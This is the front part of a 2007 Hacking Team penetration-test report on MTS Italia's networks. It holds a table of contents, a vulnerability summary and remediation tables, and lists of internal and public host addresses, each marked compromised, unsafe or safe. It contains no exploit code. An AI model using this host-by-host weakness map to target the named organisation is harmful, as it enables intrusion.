security assessment (internal, external and applications) · mts italia security assessment...
TRANSCRIPT
MTS Italia
Security Assessment
(Internal, external and applications)
Hacking Team S.r.l. http://www.hackingteam.it
Via della Moscova, 1320121 MILANO (MI) - Italy
Tel. +39.02.29060603 Fax +39.02.63118946
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 1 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Revision history
Versione Date Changes
1.0 September 25, 2007 First release
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 2 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
INFORMATION
Release date September 25, 2007
Version 1.0
Document type Assessment report
Pages 460
Authors
Approved by
INDEX
1 Technical synthesis ......................................................................................................................... 12
2 Introduction ...................................................................................................................................... 17
2.1 Goal ........................................................................................................................................... 17
2.2 Outputs ..................................................................................................................................... 17
2.3 Testing conditions ..................................................................................................................... 17
2.4 Test targets ............................................................................................................................... 18
3 Testing methodology ....................................................................................................................... 20
3.1 Activities carried out .................................................................................................................. 20
3.2 Used tools ................................................................................................................................. 21
4 Discovered vulnerabilities ............................................................................................................... 23
4.1 V1 – Null sessions .................................................................................................................... 23
4.1.1 Description ......................................................................................................................... 23
4.1.2 Solution .............................................................................................................................. 23
4.2 V2 – Missing, weak or default passwords ................................................................................ 25
4.2.1 Description ......................................................................................................................... 25
4.2.2 Solution .............................................................................................................................. 25
4.3 V3 – Outdated Veritas backup client software ......................................................................... 25
4.3.1 Description ......................................................................................................................... 25
4.3.2 Solution .............................................................................................................................. 26
4.4 V4 – Predictable TCP sequence numbers ............................................................................... 26
4.4.1 Description ......................................................................................................................... 26
4.4.2 Solution .............................................................................................................................. 26
4.5 V5 – Outdated operating system services ............................................................................... 26
4.5.1 Description ......................................................................................................................... 26
4.5.2 Solution .............................................................................................................................. 26
4.6 V6 – Clear text protocols .......................................................................................................... 27
4.6.1 Description ......................................................................................................................... 27
4.6.2 Solution .............................................................................................................................. 27
4.7 V7 – Information disclosure ...................................................................................................... 27
4.7.1 Description ......................................................................................................................... 27
4.7.2 Solution .............................................................................................................................. 28
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 3 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
4.8 V8 – Denial of Service .............................................................................................................. 28
4.8.1 Description ......................................................................................................................... 28
4.8.2 Solution .............................................................................................................................. 28
4.9 V9 – Credentials reuse ............................................................................................................. 28
4.9.1 Description ......................................................................................................................... 28
4.9.2 Solution .............................................................................................................................. 29
4.10 V10 – Privilege escalation ...................................................................................................... 29
4.10.1 Description ....................................................................................................................... 29
4.10.2 Solution ............................................................................................................................ 29
4.11 V11 – File include vulnerability ............................................................................................... 29
4.11.1 Description ....................................................................................................................... 29
4.11.2 Solution ............................................................................................................................. 30
4.12 V12 – Dynamic HTML unfiltered parameter ........................................................................... 30
4.12.1 Description ....................................................................................................................... 30
4.12.2 Solution ............................................................................................................................ 30
5 External Perimeter ........................................................................................................................... 31
5.1 Technical summary ................................................................................................................... 31
5.2 Network and services discovery ............................................................................................... 31
5.3 Localized corporate website - 194.185.196.226 ...................................................................... 33
5.4 Corporate website ................................................................................................................... 35
5.5 Bondvision website ................................................................................................................... 36
5.6 Euro MTS Index website .......................................................................................................... 37
5.7 Vadds website ........................................................................................................................... 56
6 Internal networks ............................................................................................................................. 59
6.1 Technical summary ................................................................................................................... 59
6.2 Servers ...................................................................................................................................... 61
6.3 Servers in Network 192.168.254.0/24 ...................................................................................... 61
6.3.1 192.168.254.10 [Compromised] ........................................................................................ 61
6.3.2 192.168.254.16 [Compromised] ........................................................................................ 63
6.3.3 192.168.254.21 [Compromised] ........................................................................................ 64
6.3.4 192.168.254.22 [Compromised] ........................................................................................ 65
6.3.5 192.168.254.60, 192.168.254.151, 192.168.254.153, 192.168.254.180,
192.168.254.182, 192.168.254.184 [Compromised] .................................................................. 67
6.3.6 192.168.254.61, 192.168.254.150, 192.168.254.152, 192.168.254.154,
192.168.254.170, 192.168.254.181, 192.168.254.183, 192.168.254.185 [Compromised] ....... 85
6.3.7 192.168.254.142 [Compromised] ...................................................................................... 98
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 4 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.3.8 192.168.254.1 [Unsafe] ................................................................................................... 107
6.3.9 192.168.254.6 [Unsafe] ................................................................................................... 108
6.3.10 192.168.254.7 [Unsafe] .................................................................................................. 110
6.3.11 192.168.254.8 [Unsafe] .................................................................................................. 111
6.3.12 192.168.254.9 [Unsafe] .................................................................................................. 113
6.3.13 192.168.254.11 [Unsafe] ................................................................................................ 115
6.3.14 192.168.254.12 [Unsafe] ................................................................................................ 116
6.3.15 192.168.254.23 [Unsafe] ................................................................................................ 118
6.3.16 192.168.254.24 [Unsafe] ................................................................................................ 119
6.3.17 192.168.254.230 [Unsafe] ............................................................................................. 121
6.3.18 192.168.254.250 [Unsafe] ............................................................................................. 122
6.3.19 192.168.254.252 [Unsafe] ............................................................................................. 123
6.3.20 192.168.254.15 [Unsafe] ............................................................................................... 125
6.3.21 192.168.254.70 [Unsafe] ............................................................................................... 126
6.3.22 192.168.254.161 [Unsafe] ............................................................................................. 127
6.3.23 192.168.254.235 [Unsafe] ............................................................................................. 128
6.3.24 192.168.254.140 [Safe] ................................................................................................. 129
6.3.25 192.168.254.159 [Safe] ................................................................................................. 130
6.3.26 192.168.254.160 [Safe] ................................................................................................. 130
6.3.27 192.168.254.162 [Safe] ................................................................................................. 131
6.3.28 192.168.254.163 [Safe] ................................................................................................. 132
6.3.29 192.168.254.210 [Safe] ................................................................................................. 133
6.3.30 192.168.254.211 [Safe] .................................................................................................. 134
6.3.31 192.168.254.220 [Safe] ................................................................................................. 134
6.3.32 192.168.254.221 [Safe] ................................................................................................. 135
6.4 Servers in Network 192.168.244.0/24 .................................................................................... 136
6.4.1 192.168.244.60 [Compromised] ...................................................................................... 136
6.4.2 192.168.244.140 [Compromised] .................................................................................... 141
6.4.3 192.168.244.160 [Unsafe] ............................................................................................... 142
6.4.4 192.168.244.161 [Unsafe] ............................................................................................... 142
6.4.5 192.168.244.23 [Unsafe] ................................................................................................. 143
6.4.6 192.168.244.1 [Safe] ....................................................................................................... 145
6.5 Servers in Network 192.168.210.0/24 .................................................................................... 146
6.5.1 192.168.210.11 [Compromised] ...................................................................................... 146
6.5.2 192.168.210.18 [Compromised] ...................................................................................... 147
6.5.3 192.168.210.30 [Compromised] ...................................................................................... 150
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 5 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.5.4 192.168.210.31 [Compromised] ...................................................................................... 156
6.5.5 192.168.210.32 [Compromised] ...................................................................................... 167
6.5.6 192.168.210.24, 192.168.210.25, 192.168.210.27, 192.168.210.28, 192.168.210.29
[Unsafe] ..................................................................................................................................... 171
6.5.7 192.168.210.26, 192.168.210.35 [Unsafe] ...................................................................... 173
6.5.8 192.168.210.34 [Unsafe] ................................................................................................. 174
6.5.9 192.168.210.20 [Safe] ..................................................................................................... 175
6.5.10 192.168.210.183 [Safe] ................................................................................................. 176
6.6 Servers in Network 100.100.200.0/24 .................................................................................... 176
6.6.1 100.100.200.5 [Compromised] ........................................................................................ 176
6.6.2 100.100.200.13 [Compromised] ...................................................................................... 179
6.6.3 100.100.200.14 [Compromised] ...................................................................................... 197
6.6.4 100.100.200.21 [Compromised] ...................................................................................... 203
6.6.5 100.100.200.73 [Compromised] ...................................................................................... 207
6.6.6 100.100.200.179 [Compromised] .................................................................................... 215
6.6.7 100.100.200.233 [Compromised] .................................................................................... 216
6.6.8 100.100.200.11 [Unsafe] .................................................................................................. 217
6.6.9 100.100.200.22 [Unsafe] ................................................................................................. 218
6.6.10 100.100.200.23 [Unsafe] ............................................................................................... 220
6.6.11 100.100.200.25, 100.100.200.27, 100.100.200.28, 100.100.200.29, 100.100.200.30,
100.100.200.31 [Unsafe] ........................................................................................................... 221
6.6.12 100.100.200.26 [Unsafe] ............................................................................................... 223
6.6.13 100.100.200.32 [Unsafe] ............................................................................................... 224
6.6.14 100.100.200.35 [Unsafe] ............................................................................................... 225
6.6.15 100.100.200.36 [Unsafe] ............................................................................................... 227
6.6.16 100.100.200.37 [Unsafe] ............................................................................................... 227
6.6.17 100.100.200.80 [Unsafe] ............................................................................................... 228
6.6.18 100.100.200.108 [Unsafe] ............................................................................................. 229
6.6.19 100.100.200.156 [Unsafe] ............................................................................................. 230
6.6.20 100.100.200.232 [Unsafe] ............................................................................................. 231
6.6.21 100.100.200.107 [Safe] ................................................................................................. 231
6.6.22 100.100.200.247 [Safe] ................................................................................................. 232
6.6.23 100.100.200.254 [Safe] ................................................................................................. 233
6.7 Servers in Network 100.100.100.0/24 .................................................................................... 234
6.7.1 100.100.100.15 [Compromised] ...................................................................................... 234
6.7.2 100.100.100.20 [Compromised] ...................................................................................... 234
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 6 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.7.3 100.100.100.24, 100.100.100.25, 100.100.100.27, 100.100.100.29, 100.100.100.30
[Compromised] .......................................................................................................................... 236
6.7.4 100.100.100.28 [Compromised] ...................................................................................... 240
6.7.5 100.100.100.50 [Compromised] ...................................................................................... 241
6.7.6 100.100.100.26 [Unsafe] ................................................................................................. 242
6.7.7 100.100.100.124 [Unsafe] ............................................................................................... 243
6.8 Workstation ............................................................................................................................. 244
6.9 Workstations in Network 192.168.254.0/24 ........................................................................... 244
6.10 Workstations in Network 192.168.244.0/24 ......................................................................... 244
6.11 Workstations in Network 192.168.210.0/24 ......................................................................... 245
6.11.1 192.168.210.117 [Compromised] ................................................................................... 245
6.11.2 192.168.210.181 [Compromised] .................................................................................. 248
6.11.3 192.168.210.112 [Unsafe] .............................................................................................. 252
6.11.4 192.168.210.15 [Safe] .................................................................................................... 252
6.11.5 192.168.210.16 [Safe] .................................................................................................... 253
6.11.6 192.168.210.17 [Safe] .................................................................................................... 254
6.11.7 192.168.210.23 [Safe] .................................................................................................... 255
6.11.8 192.168.210.110 [Safe] .................................................................................................. 255
6.11.9 192.168.210.115 [Safe] .................................................................................................. 256
6.11.10 192.168.210.118 [Safe] ................................................................................................ 257
6.11.11 192.168.210.121 [Safe] ................................................................................................ 258
6.11.12 192.168.210.132 [Safe] ................................................................................................ 258
6.11.13 192.168.210.136 [Safe] ................................................................................................ 259
6.11.14 192.168.210.170 [Safe] ................................................................................................ 260
6.11.15 192.168.210.177 [Safe] ................................................................................................ 260
6.11.16 192.168.210.179 [Safe] ................................................................................................ 261
6.11.17 192.168.210.180 [Safe] ................................................................................................ 262
6.11.18 192.168.210.185 [Safe] ................................................................................................ 263
6.11.19 192.168.210.193 [Safe] ................................................................................................ 263
6.11.20 192.168.210.194 [Safe] ................................................................................................ 264
6.11.21 192.168.210.195 [Safe] ................................................................................................ 265
6.11.22 192.168.210.196 [Safe] ................................................................................................ 266
6.11.23 192.168.210.197 [Safe] ................................................................................................ 266
6.11.24 192.168.210.199 [Safe] ................................................................................................ 267
6.12 Workstations in Network 100.100.200.0/24 ......................................................................... 268
6.12.1 100.100.200.61 [Unsafe] ............................................................................................... 268
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 7 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.12.2 100.100.200.65 [Unsafe] ............................................................................................... 269
6.12.3 100.100.200.67 [Unsafe] ............................................................................................... 270
6.12.4 100.100.200.70 [Unsafe] ............................................................................................... 270
6.12.5 100.100.200.77 [Unsafe] ............................................................................................... 271
6.12.6 100.100.200.79 [Unsafe] ............................................................................................... 272
6.12.7 100.100.200.91 [Unsafe] ............................................................................................... 273
6.12.8 100.100.200.113 [Unsafe] .............................................................................................. 274
6.12.9 100.100.200.116 [Unsafe] .............................................................................................. 274
6.12.10 100.100.200.131 [Unsafe] ........................................................................................... 275
6.12.11 100.100.200.38 [Safe] .................................................................................................. 276
6.12.12 100.100.200.62 [Safe] ................................................................................................. 276
6.12.13 100.100.200.63 [Safe] ................................................................................................. 277
6.12.14 100.100.200.64 [Safe] ................................................................................................. 278
6.12.15 100.100.200.69 [Safe] ................................................................................................. 278
6.12.16 100.100.200.71 [Safe] ................................................................................................. 279
6.12.17 100.100.200.76 [Safe] ................................................................................................. 280
6.12.18 100.100.200.81 [Safe] ................................................................................................. 280
6.12.19 100.100.200.83 [Safe] ................................................................................................. 281
6.12.20 100.100.200.86 [Safe] ................................................................................................. 281
6.12.21 100.100.200.87 [Safe] ................................................................................................. 282
6.12.22 100.100.200.88 [Safe] ................................................................................................. 283
6.12.23 100.100.200.90 [Safe] ................................................................................................. 284
6.12.24 100.100.200.98 [Safe] ................................................................................................. 284
6.12.25 100.100.200.99 [Safe] ................................................................................................. 285
6.12.26 100.100.200.104 [Safe] ............................................................................................... 286
6.12.27 100.100.200.106 [Safe] ............................................................................................... 286
6.12.28 100.100.200.114 [Safe] ................................................................................................ 287
6.12.29 100.100.200.117 [Safe] ................................................................................................ 287
6.12.30 100.100.200.126 [Safe] ............................................................................................... 288
6.12.31 100.100.200.132 [Safe] ............................................................................................... 289
6.12.32 100.100.200.134 [Safe] ............................................................................................... 290
6.12.33 100.100.200.136 [Safe] ............................................................................................... 291
6.12.34 100.100.200.149 [Safe] ............................................................................................... 291
6.12.35 100.100.200.151 [Safe] ............................................................................................... 292
6.12.36 100.100.200.152 [Safe] ............................................................................................... 292
6.12.37 100.100.200.153 [Safe] ............................................................................................... 293
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 8 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.12.38 100.100.200.154 [Safe] ............................................................................................... 294
6.12.39 100.100.200.155 [Safe] ............................................................................................... 294
6.12.40 100.100.200.157 [Safe] ............................................................................................... 295
6.12.41 100.100.200.158 [Safe] ............................................................................................... 296
6.12.42 100.100.200.159 [Safe] ............................................................................................... 296
6.12.43 100.100.200.180 [Safe] ............................................................................................... 297
6.12.44 100.100.200.181 [Safe] ............................................................................................... 298
6.12.45 100.100.200.182 [Safe] ............................................................................................... 298
6.12.46 100.100.200.183 [Safe] ............................................................................................... 299
6.12.47 100.100.200.190 [Safe] ............................................................................................... 300
6.13 Workstations in Network 100.100.100.0/24 ......................................................................... 300
6.13.1 100.100.100.81 [Unsafe] ............................................................................................... 300
6.13.2 100.100.100.5 [Safe] ..................................................................................................... 301
6.13.3 100.100.100.6 [Safe] ..................................................................................................... 302
6.13.4 100.100.100.7 [Safe] ..................................................................................................... 303
6.13.5 100.100.100.10 [Safe] ................................................................................................... 303
6.13.6 100.100.100.11 [Safe] .................................................................................................... 304
6.13.7 100.100.100.40 [Safe] ................................................................................................... 305
6.13.8 100.100.100.41 [Safe] ................................................................................................... 305
6.13.9 100.100.100.44 [Safe] ................................................................................................... 306
6.13.10 100.100.100.45 [Safe] ................................................................................................. 307
6.13.11 100.100.100.46 [Safe] .................................................................................................. 308
6.13.12 100.100.100.47 [Safe] ................................................................................................. 308
6.13.13 100.100.100.97 [Safe] ................................................................................................. 309
6.14 Printers ................................................................................................................................. 310
6.15 Printers in Network 192.168.254.0/24 .................................................................................. 310
6.16 Printers in Network 192.168.244.0/24 .................................................................................. 310
6.17 Printers in Network 192.168.210.0/24 .................................................................................. 310
6.17.1 192.168.210.40 [Compromised] .................................................................................... 310
6.17.2 192.168.210.41 [Compromised] .................................................................................... 311
6.17.3 192.168.210.42 [Compromised] .................................................................................... 312
6.17.4 192.168.210.44 [Compromised] .................................................................................... 316
6.17.5 192.168.210.47 [Compromised] .................................................................................... 317
6.17.6 192.168.210.48 [Compromised] .................................................................................... 318
6.18 Printers in Network 100.100.200.0/24 .................................................................................. 319
6.18.1 100.100.200.47 [Compromised] .................................................................................... 319
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 9 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.18.2 100.100.200.48 [Compromised] .................................................................................... 320
6.18.3 100.100.200.49 [Compromised] .................................................................................... 321
6.18.4 100.100.200.50 [Compromised] .................................................................................... 322
6.18.5 100.100.200.52 [Compromised] .................................................................................... 323
6.18.6 100.100.200.53 [Compromised] .................................................................................... 324
6.18.7 100.100.200.56 [Compromised] .................................................................................... 325
6.18.8 100.100.200.57 [Compromised] .................................................................................... 326
6.18.9 100.100.200.58 [Compromised] .................................................................................... 327
6.18.10 100.100.200.59 [Compromised] .................................................................................. 328
6.18.11 100.100.200.249 [Compromised] ................................................................................ 329
6.18.12 100.100.200.250 [Compromised] ................................................................................ 330
6.18.13 100.100.200.251 [Compromised] ................................................................................ 331
6.18.14 100.100.200.252 [Compromised] ................................................................................ 338
6.18.15 100.100.200.253 [Compromised] ................................................................................ 342
6.18.16 100.100.200.46 [Safe] ................................................................................................. 343
6.19 Printers in Network 100.100.100.0/24 .................................................................................. 343
6.19.1 100.100.100.102 [Compromised] .................................................................................. 344
6.19.2 100.100.100.148 [Compromised] .................................................................................. 344
6.19.3 100.100.100.149 [Compromised] .................................................................................. 345
6.19.4 100.100.100.151 [Compromised] .................................................................................. 346
6.19.5 100.100.100.251 [Compromised] .................................................................................. 347
7 Oracle Auditing ............................................................................................................................. 349
7.1 Technical Summary ................................................................................................................ 349
7.1.1 100.100.200.5 [Compromised] ........................................................................................ 349
7.1.2 100.100.245.12 [Compromised] ...................................................................................... 365
7.1.3 100.100.245.15 [Compromised] ...................................................................................... 366
7.1.4 100.100.245.16 [Compromised] ...................................................................................... 368
7.1.5 100.100.245.21 [Compromised] ...................................................................................... 377
7.1.6 100.100.245.22 [Compromised] ...................................................................................... 384
7.1.7 100.100.245.142 [Compromised] .................................................................................... 389
7.1.8 100.100.245.230 [Compromised] .................................................................................... 390
7.1.9 100.100.245.6 [Safe] ....................................................................................................... 393
7.1.10 100.100.245.8 [Safe] ..................................................................................................... 394
7.1.11 100.100.245.10 [Safe] .................................................................................................... 395
8 Appendix A ..................................................................................................................................... 397
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 10 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Pictures index
Figure 1 - Global systems state chart................................................................................................13
Figure 2 - Servers state......................................................................................................................14
Figure 3 - Workstations state.............................................................................................................14
Figure 4 - Printers state......................................................................................................................15
Figure 5 - Oracle servers state...........................................................................................................15
Figure 6 - Internet application servers state......................................................................................16
Figure 7 - Network schematics...........................................................................................................18
Figure 8 - Macro-activities performed................................................................................................21
Tables index
Table 1 - Vulnerabilities and their respective impact and risk............................................................13
Table 2 - Vulnerability solutions and effort required to implement them............................................16
Table 3 - Target networks..................................................................................................................18
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 11 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
1 Technical synthesis
This document describes the vulnerability assessment activites performed on the MTS Italia netblocks.
The approach taken to perform the tests was the black-box type, where the analysis was conducted without
knowing any detail of the target systems, followed later by a white-box one for the application servers.
The tests were made against the public network hosting the corporate website and its exposed services and
against some internal networks.
All the activity has been done on “live” systems. For this reason all tests, either by type or execution mode,
have been accurately chosen with the aim not to disrupt the correct working of the systems. No attack which
could have left the targets in an unusable state or compromise their integrity has been performed.
104 systems have been identified as being servers, 84 as being workstations and 27 as printers, for a total of
216 systems.
Many systems had more than one service installed.
Systems have been identified as Compromised, Unsafe or Safe.
Compromised systems are the ones where a discovered vulnerability has actually been exploited to penetrate
the system.
Unsafe systems are the ones which could easily be exploited by an attacker but have not been exploited
during the test
Safe systems didn't show any vulnerability during the test.
As a result of the assessment, the overall security state can be summarized as very low.
Several critical vulnerabilities have been found. They allowed to totally compromise many servers,
some workstations, almost all printers and to gain full control of some Active Directory branches.
Many critical vulnerabilities allowed a full breach of 8 out of 11 Oracle database servers as well.
The Euro MTS Index website has also been fully compromised with a remote unreleased and specially
crafted exploit, giving full control of the server OS and all of its data.
As result, also the data feed, the bvportal application and the ftp services have been compromised
because they share the same server and clear text passwords for all the ftp users have been found.
The corporate website has been found positive to information disclosure issues.
The localized corporate website may be abused remotely to perform Cross Site Scripting attacks.
The vadds application must be patched to avoid some remote Denial of Service.
The following chart shows the calculated ratios.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 12 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Figure 1 - Global systems state chart
The following table synthesizes the discovered high risk vulnerabilities, showing the main consequences for
each of them, the technical skill level required to exploit them and the corresponding risk level:
Nr. Vulnerability type ImpactSkill level
required to exploit it
Risk level
V1 Null session Allows unauthorized disclosure of information Low High
V2Missing, weak or default password
Allows access to the underlying OS and/or resources Low High
V3Outdated Veritas
backup client software
Allows access to the host OS and/or resources through remote exploiting
Medium High
V4Predictable TCP sequence number Allows “Man In The Middle” type attacks Medium High
V5Outdated operating system service or
other software
Allows access to resources either trivially or by using an exploit
Low High
V6 Clear text protocolAllows an intruder to sniff login credentials and sessions Medium High
V7Information disclosure Allows access to private/restricted resources Low High
V8 Denial of ServiceAllows interruption of the service(s) offered by the system or the system itself Low High
V9 Credentials reuseAllows access to a system/service with credentials found on another system Low High
V10 Privilege escalationAllows an unprivileged user to gain additional privileges which normally belong only to administrators
Medium High
V11File include vulnerability Allows full control of the underlying OS High High
V12Dynamic HTML
unfiltered parameter Allows client side attacks (i.e. XSS) Low High
Table 1 - Vulnerabilities and their respective impact and risk
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 13 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Compromised/Unsafe/Safe Chart
Compromised
Unsafe
Safe
Some low risk vulnerabilities have been identified too but they will be listed in the in-depth review for each
system affected.
The following picture shows the servers state:
Figure 2 - Servers state
This picture show the workstations state:
Figure 3 - Workstations state
This picture show the printers state:
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 14 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Servers state
Compromised
Unsafe
Safe
Workstations state
Compromised
Unsafe
Safe
Figure 4 - Printers state
The next picture shows the state of Oracle servers:
Figure 5 - Oracle servers state
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 15 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Printers state
Compromised
UnsafeSafe
Oracle servers state
Compromised
UnsafeSafe
Figure 6 - Internet application servers state
The following table shows the recommended actions which must be implemented to patch the discovered
vulnerabilities and to increase the overall security level:
N° Vulnerability type Suggested solutionEffort
required
V1 Null sessionDisable null sessions, either manually by registry or by domain policy
Low
V2Missing, weak or default password
Add passwords where missing, change all the default ones, use strong or at least not trivial passwords
Medium
V3Outdated Veritas
backup client software Replace all backup client software with up to date versions Low
V4Predictable TCP sequence number Install all TCP/IP vendor patches Low
V5Outdated operating
system service or other software
Install all vendor patches Low
V6 Clear text protocolReplace the protocol with an encrypted equivalent (i.e. ssh instead of telnet) Medium
V7 Information disclosureProtect the access to private resources with an authorization system Medium
V8 Denial of ServiceDisable the services which experience this vulnerability or replace them with patched version whenever they may not be disabled
Low
V9 Credentials reuseUse different sets of credentials to access different services or host Medium
V10 Privilege escalationPatch local vulnerabilities to avoid an attacker using them togain more privileges Medium
V11File include vulnerability Disable/replace the vulnerable PHP script Low
V12Dynamic HTML
unfiltered parameterImplement proper parameter filtering/rewrite the function with more secure code Low
Table 2 - Vulnerability solutions and effort required to implement them
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 16 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Internet Application Servers
Compromised
Unsafe
Safe
2 Introduction
2.1 Goal
The aim of the vulnerability assessment consisted in evaluating the overall security of MTS Italia,
identifying each possible vulnerability and the corresponding attack scenario. The security tests have been
done first without any previous knowledge of the targets (this approach is technically named black-box) and
then with some knowledge of the targets (white-box).
2.2 Outputs
This document contains the results of the assessment and it contains the following sections:
Technical synthesis of the assessment
Testing methodology
Description of the discovered vulnerabilities and suggested solutions
External perimeter
External Applications
Internal servers
Internal clients
Printers
Oracle databases
2.3 Testing conditions
Some constrains limited the analysis activity. The major ones are:
No DoS (Denial of Service) has been performed because they could render unoperable or even damage
the “live” system. Please not that almost all critical and high risk vulnerabilities might lead to DoS.
For the black-box tests, no credentials or documentation has been used by the testers. This is done to
simulate an attack from people who does not have any knowledge about the attacked until he begins the
attack.
For what it concerns the effective exploit of the discovered vulnerabilities, whenever it has been possible or
feasible, the testers collected some data to prove the successful exploit:© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 17 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Data has been collected either to be used in further testing or as a proof
A user has been added to the system whenever the acquired privileges allowed this operation. This
operation is always documented and the user has been deleted as soon as it wasn't useful anymore for the
testing purposes or at the tests end
All databases have not been modified even when this has been possible with the acquired privileges
2.4 Test targets
The following table shows the internal networks which have been tested.
IP
100.100.100.0/24
100.100.200.0/24
192.168.210.0/24
192.168.244.0/24
192.168.254.0/24
Table 3 - Target networks
All tests have been done remotely from PCs belonging to the Hacking Team S.r.l. networks.
Tests against the Internet exposed services have been done without any previously known information.
Tests against the internal networks have been done by setting up a VPN connection from Hacking Team
networks to a router in the MPS Italia networks.
Figure 7 - Network schematics
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 18 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
VPN
MTS RouterMTS Lan 1MTS Lan 2MTS Lan n
HT Lan
HT Attacking PCs
This allowed us to perform some tests even beyond the usual working time and to transfer all data in a
private and secure way back and forth between the two nekworks.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 19 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
3 Testing methodology
This chapter will briefly list how the tests have been done and which major tools have been used during the
tests.
3.1 Activities carried out
All tests have been accomplished by using state of the art attacking techniques and the approach has been
either manual or automatic, for each specific target. The testing procedure is a synthesis of the Open-Source
Security Testing Methodology Manual (OSSTMM) and established Hacking Team internal and well tested
procedures.
The ordinary possible approaches are the following:
• Manual only
• Automatic only (by using freely or commercial tools)
• Automatic with manual intervention whenever required. In this case some tools help the tester with
the more repetitive tasks especially in a complex attack scenario but human intervention is required
to filter out false positives or review some suspect vulnerabilities found by the tools or to gather the
evidences.
The approach followed has changed and has been tuned to each target so the activity has been a mixture of
the three main possible types.
The macro-activities sequence which has been carried out could be depicted with the following figure:
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 20 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Figure 8 - Macro-activities performed
3.2 Used tools
The vulnerability assessment tools which have been utilized are the following ones:
System vulnerability scanner: automatic operating system and network scanners. These tools look for
known vulnerabilities in systems, OS and services. They normally make use of specially crafted plugins
to test for the vulnerabilities. The tool used during this assessment was Nessus.
Network discovery tools: these programs and OS tools allow to figure out and paint a possible network
